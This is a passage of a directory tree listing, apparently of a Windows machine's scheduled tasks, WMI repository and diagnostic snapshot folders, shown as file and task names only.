&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FamilySafetyRefreshTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; IndexerAutomaticMaintenance
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ThemesSyncedImageDownload
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UpdateUserPictureTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SoftwareProtectionPlatform
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SvcRestartTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SvcRestartTaskLogon
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SvcRestartTaskNetwork
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SpacePort
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SpaceAgentTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SpaceManagerTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Speech
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SpeechModelDownloadTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; StateRepository
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MaintenanceTasks
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Storage Tiers Management
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Storage Tiers Management Initialization
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Storage Tiers Optimization
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Subscription
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EnableLicenseAcquisition
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LicenseAcquisition
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Sysmain
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HybridDriveCachePrepopulate
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HybridDriveCacheRebalance
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ResPriStaticDbSync
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WsSwapAssessmentTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SystemRestore
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SR
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Task Manager
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Interactive
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TextServicesFramework
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MsCtfMonitor
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Time Synchronization
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ForceSynchronizeTime
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SynchronizeTime
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Time Zone
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SynchronizeTimeZone
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TPM
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Tpm-HASCertRetr
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Tpm-Maintenance
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UNP
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; RunUpdateNotificationMgr
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UpdateOrchestrator
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Report policies
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Schedule Maintenance Work
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Schedule Scan
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Schedule Scan Static Task
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Schedule Wake To Work
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Schedule Work
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UpdateModelTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; USO_UxBroker
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UPnP
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UPnPHostConfig
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; USB
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Usb-Notifications
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; User Profile Service
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; HiveUploadTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WaaSMedic
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PerformRemediation
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WCM
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WiFiTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WDI
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ResolutionHost
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WindowsColorSystem
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Calibration Loader
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows Defender
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows Defender Cache Maintenance
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows Defender Cleanup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows Defender Scheduled Scan
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Windows Defender Verification
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows Error Reporting
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; QueueReporting
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows Filtering Platform
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; BfeOnServiceStartTypeChange
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows Media Sharing
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UpdateLibrary
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WindowsUpdate
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Scheduled Start
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Wininet
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; CacheTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WlanSvc
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; CDSSync
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WOF
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WIM-Hash-Management
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WIM-Hash-Validation
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Work Folders
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Work Folders Logon Synchronization
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Work Folders Maintenance Work
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Workplace Join
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Automatic-Device-Join
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Device-Sync
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Recovery-Check
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WwanSvc
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NotificationTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; OobeDiscovery
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; XblGameSave
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; XblGameSaveTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MicrosoftEdgeUpdateTaskMachineCore
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MicrosoftEdgeUpdateTaskMachineUA
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive Reporting Task-S-1-5-21-3871582759-1638593395-315824688-1002
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive Reporting Task-S-1-5-21-3871582759-1638593395-315824688-500
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive Standalone Update Task-S-1-5-21-3871582759-1638593395-315824688-1002
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive Standalone Update Task-S-1-5-21-3871582759-1638593395-315824688-500
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive Startup Task-S-1-5-21-3871582759-1638593395-315824688-1002
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive Startup Task-S-1-5-21-3871582759-1638593395-315824688-500
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SysHelper Update
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; wbem
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Repository
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; INDEX.BTR
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MAPPING1.MAP
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MAPPING2.MAP
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MAPPING3.MAP
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; OBJECTS.DATA
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WDI
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {67144949-5132-4859-8036-a737b43825d8}
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {7279a32a-2acb-41b6-84fe-926d65b9f283}
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; snapshot.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {ab4d2cf1-207b-455a-aab3-89331493555d}
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; snapshot.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; {e5ac67ee-f45e-4672-917c-c0caac259cde}
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; snapshot.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {86432a0b-3c7d-4ddf-a89c-172faa90485d}
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {024525de-dbe4-4b29-9948-674682cbff61}
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; snapshot.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {6222cfad-9a32-4ade-aaa8-a8da3274858b}
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; snapshot.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {7367e702-93ef-4430-8264-c72cb4b964cb}
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; snapshot.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {818de6c2-72b3-492a-a054-baefc5284902}
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; snapshot.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; S-1-5-21-3871582759-1638593395-315824688-1001_UserData.bin
